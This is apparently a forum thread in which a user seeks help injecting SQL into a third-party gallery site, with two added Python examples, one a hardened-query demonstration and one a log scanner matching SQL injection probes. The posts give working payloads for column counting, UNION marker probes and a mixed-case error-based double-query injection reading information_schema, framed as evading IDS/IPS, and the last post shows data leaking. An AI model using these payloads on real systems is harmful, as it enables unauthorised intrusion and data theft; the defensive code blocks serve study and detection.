IT Security and Insecurity Portal

What if the webpage doesn't disclose number of columns

Posted: Thu Sep 16, 2010 6:59 am

RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Hello waraxe and experts
please forgive my lack of knowledge and don't bash me : )
usually at this step I just give up, but this time I really want to get on with this issue, and learn for further experience
I have a webpage which responds to the simplest test as such
Code:
http://site.com/guests_galleries.php?kat=1'
responding with
Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY galleries_added DESC' at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY galleries_added DESC LIMIT 0, 12' at line 1
But then when I try the next test
Code:
http://site.com/guests_galleries.php?kat=1+order+by+2--
it responds with
Quote:
Unknown column '2' in 'order clause'
I'm positive there are steps to take when such an error displays, I just don't have a clue what they are.
I can't search or google either because I don't know what I'm looking for
Please guide me : )
Thanks in advance!
Posted: Fri Sep 17, 2010 8:42 am

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Try:
Code:
http://site.com/guests_galleries.php?kat=1+order+by+1--
If you get no error, then it's one column only.
Next test:
Code:
http://site.com/guests_galleries.php?kat=-1+UNION+ALL+SELECT+11223344--
Try to find string "11223344" in html source code.
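The ORDER BY and UNION probes above only work because the page splices the kat parameter straight into the SQL text and then echoes the database's error message. The following example is added here (it is not code from the thread or from the site discussed) to show that pattern next to its fix: an in-memory SQLite table stands in for the galleries table, so the error strings differ from MySQL's "Unknown column" wording, but the behaviour is the same. The table schema, the row data and the handle_request wrapper are all constructed for the example.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the site's galleries table (not its real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE galleries (id INTEGER, kat INTEGER, title TEXT, galleries_added TEXT)"
    )
    conn.executemany(
        "INSERT INTO galleries VALUES (?, ?, ?, ?)",
        [
            (1, 1, "first", "2010-09-01"),
            (2, 1, "second", "2010-09-02"),
            (3, 2, "other", "2010-09-03"),
        ],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, kat: str) -> list:
    """The pattern the thread's symptoms imply: the raw parameter is spliced into the SQL text,
    so 'ORDER BY n' or 'UNION ALL SELECT ...' in the parameter is parsed as SQL."""
    sql = f"SELECT title FROM galleries WHERE kat={kat} ORDER BY galleries_added DESC"
    return [row[0] for row in conn.execute(sql)]


def vulnerable_error(conn: sqlite3.Connection, kat: str):
    """Return the driver's error text for a probe, or None when the query ran.
    A page that prints this string to the visitor is giving exactly the feedback the
    poster saw (syntax error for a stray quote, column-count error for ORDER BY n)."""
    try:
        vulnerable_lookup(conn, kat)
        return None
    except sqlite3.Error as exc:
        return str(exc)


def hardened_lookup(conn: sqlite3.Connection, kat: str) -> list:
    """Validate the shape of the input first, then bind it as a value, never as SQL text."""
    if not re.fullmatch(r"[0-9]{1,9}", kat):
        raise ValueError("kat must be a small non-negative integer")
    sql = "SELECT title FROM galleries WHERE kat=? ORDER BY galleries_added DESC"
    return [row[0] for row in conn.execute(sql, (int(kat),))]


def handle_request(conn: sqlite3.Connection, kat: str) -> tuple:
    """Map outcomes to (status, body) without echoing database error text to the client."""
    try:
        rows = hardened_lookup(conn, kat)
    except ValueError:
        return 400, "Bad request"
    except sqlite3.Error:
        # Log the driver message server-side; the client only ever sees a generic text.
        return 500, "Internal error"
    return 200, ", ".join(rows)


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "1 ORDER BY 1--", "1 ORDER BY 2--", "-1 UNION ALL SELECT 11223344--"):
        err = vulnerable_error(db, probe)
        print(f"vulnerable kat={probe!r}: ", err or vulnerable_lookup(db, probe))
        print(f"hardened   kat={probe!r}: ", handle_request(db, probe))
```

Two things to notice when running it: the vulnerable handler returns a "normal-looking" page for ORDER BY 1 but with a different row order (it is now sorting by the first selected column), which is why that probe looks harmless to the site owner while confirming the injection to the tester; and the hardened handler rejects every non-integer value before it reaches the database, so no column-count or syntax feedback exists to be leaked.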
Posted: Fri Sep 17, 2010 11:42 am

RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Hi waraxe and thank you for your time
well I thought it must have more than one column, because the initial error mentions
Quote:
near '' ORDER BY galleries_added DESC'
I forgot to mention that
://site.com/guests_galleries.php?kat=1+order+by+1--
results in a perfect original page..
I also discovered that by incrementing
://site.com/guests_galleries.php?kat=1+order+by+2--
to
://site.com/guests_galleries.php?kat=1+order+by+26--
that the error only appears once
Quote:
Unknown column '26' in 'order clause'
etc, while
://site.com/guests_galleries.php?kat=1+order+by+27--
and higher, results in double display of the error
Quote:
Unknown column '27' in 'order clause'Unknown column '27' in 'order clause'
so I'm thinking maybe there could be 26 columns in this table?
but trying
://site.com/guests_galleries.php?kat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
I get a blank part of the page where the content normally is
same for trying ://site.com/guests_galleries.php?kat=-1+UNION+ALL+SELECT+11223344--
I've checked the source in all cases including the last as you suggested and there's nothing there.. (no 11223344 in our case)
instead, it shows this html code in the source
Code:
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
<p> ;;</p>
I hope I've provided all necessary info :)
Thanks again
Posted: Fri Sep 17, 2010 1:48 pm

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

You must try to get working data feedback.
Try:
Code:
http://site.com/guests_galleries.php?kat=-1+union+all+select+1122331,1122332,1122333,1122334,1122335,1122336,1122337,1122338,1122339,11223310,11223311,11223312,11223313,11223314,11223315,11223316,11223317,11223318,11223319,11223320,11223321,11223322,11223323,11223324,11223325,11223326--
and look for specific strings.
If you are unable to get normal data feedback, then exploitation may still be possible - there are blind injection methods for that, for example:
http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf
Posted: Fri Sep 17, 2010 3:52 pm

RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Thanks a lot waraxe
unfortunately this yielded the same <p> ;;</p> stuff, so I'll turn to reading in hope to see the light, although it might prove very difficult since my scripting language skills are zero.
And thank you for the link :)
Re: What if the webpage doesn't disclose number of columns

Posted: Sat Sep 18, 2010 2:45 am

Plitvix
Beginner
Joined: Sep 18, 2010
Posts: 1

Maybe you can try some double query injections like
Code:
aND (SeLEct 1 FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct CoNCaT(DaTABasE()) FrOM inFoRMAtioN_ScHEmA.TabLEs LiMiT 0,1),fLOOr(Rand(0)*2))x FrOM inFoRMAtioN_ScHEmA.TabLEs GrOUP bY x)a) AnD 13=13-- -
It will probably work.
Re: What if the webpage doesn't disclose number of columns

Posted: Mon Sep 20, 2010 7:16 am

RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Hello Plitvix
unfortunately not, but thank you
btw, why the mixture of uppercase and lowercase letters?
Plitvix wrote:
Maybe you can try some double query injections like
Code:
aND (SeLEct 1 FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct CoNCaT(DaTABasE()) FrOM inFoRMAtioN_ScHEmA.TabLEs LiMiT 0,1),fLOOr(Rand(0)*2))x FrOM inFoRMAtioN_ScHEmA.TabLEs GrOUP bY x)a) AnD 13=13-- -
It will probably work.
Posted: Mon Sep 20, 2010 8:58 am

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Mixed-case letters may sometimes pass undetected by IDS/IPS.
Try this:
Code:
http://site.com/guests_galleries.php?kat=1+aND(SeLEct+1+FrOM(SeLEct CoUNt(*),CoNCaT((SeLEct+CoNCaT(DaTABasE())+FrOM+inFoRMAtioN_ScHEmA.TabLEs+LiMiT+0,1),fLOOr(Rand(0)*2))x+FrOM+inFoRMAtioN_ScHEmA.TabLEs+GrOUP+bY+x)a)
Do you get any SQL error messages?
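The mixed-case trick only beats a signature that compares raw bytes. The script below is an added example, not code from the thread or from any IDS product, showing how a log-review rule sidesteps that: it URL-decodes each query string until it stops changing (so double encoding is caught too), lower-cases it, and only then matches the probe stages seen in this thread (ORDER BY column counting, UNION SELECT markers, information_schema reads and the FLOOR(RAND(0)*2) ... GROUP BY trick). The log lines are constructed for the example in Apache combined-log format and mirror the URLs quoted in the posts; the IP addresses are documentation ranges, not the site's.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Signatures for the probe stages shown in this thread. They are applied to a
# normalised (decoded, lower-cased, whitespace-collapsed) query string, so the
# attacker's letter case and URL encoding make no difference to the match.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_read": re.compile(r"\binformation_schema\."),
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*\bgroup\s+by\b"
    ),
}

# Apache/nginx combined-log request line (assumed log format for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def normalise(query: str) -> str:
    """URL-decode until stable (catches double encoding), lower-case, collapse whitespace."""
    prev, cur = None, query
    while cur != prev:
        prev, cur = cur, unquote_plus(cur)
    return re.sub(r"\s+", " ", cur.lower())


def classify(request_path: str) -> list:
    """Return the names of every signature hit by one request path with its query string."""
    q = normalise(urlsplit(request_path).query)
    return [name for name, rx in SIGNATURES.items() if rx.search(q)]


def scan_log(lines) -> list:
    """Return (client_ip, raw_path, hits) for every request that trips at least one signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip rather than guess
        hits = classify(m["path"])
        if hits:
            findings.append((m["ip"], m["path"], hits))
    return findings


# Constructed sample log (not from the site in the thread). The last probe's
# literal space is encoded as %20 so the record stays a valid log line.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [17/Sep/2010:11:40:01 +0000] "GET /guests_galleries.php?kat=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [17/Sep/2010:11:40:09 +0000] "GET /guests_galleries.php?kat=1+order+by+2-- HTTP/1.1" 200 312',
    '203.0.113.7 - - [17/Sep/2010:11:40:15 +0000] "GET /guests_galleries.php?kat=-1+UNION+ALL+SELECT+11223344-- HTTP/1.1" 200 290',
    '203.0.113.7 - - [20/Sep/2010:08:59:30 +0000] "GET /guests_galleries.php?kat=1+aND(SeLEct+1+FrOM(SeLEct%20CoUNt(*),CoNCaT((SeLEct+CoNCaT(DaTABasE())+FrOM+inFoRMAtioN_ScHEmA.TabLEs+LiMiT+0,1),fLOOr(Rand(0)*2))x+FrOM+inFoRMAtioN_ScHEmA.TabLEs+GrOUP+bY+x)a) HTTP/1.1" 200 330',
    '198.51.100.2 - - [20/Sep/2010:09:00:02 +0000] "GET /guests_galleries.php?kat=2 HTTP/1.1" 200 4880',
]

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG_LINES):
        print(ip, hits, path)
```

The normal requests for kat=1 and kat=2 produce no finding; the three probes are each classified by stage, and the same client address across all of them is the kind of correlation an analyst would escalate. Because matching happens after decoding and lower-casing, "OrDeR+By" and a "%2B"-encoded "+" are caught just as the plain forms are.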
Posted: Wed Sep 29, 2010 9:48 am

RubberDoll
Active user
Joined: Jun 04, 2009
Posts: 46

Hello again waraxe, thank you for still keeping an eye on this topic :)
yes, in fact I do
well, I get an error. Whether it's a SQL-related error, I'm not sure anymore
Code:
Duplicate entry 'kylacolepre1' for key 1Duplicate entry 'kylacolepre1' for key 1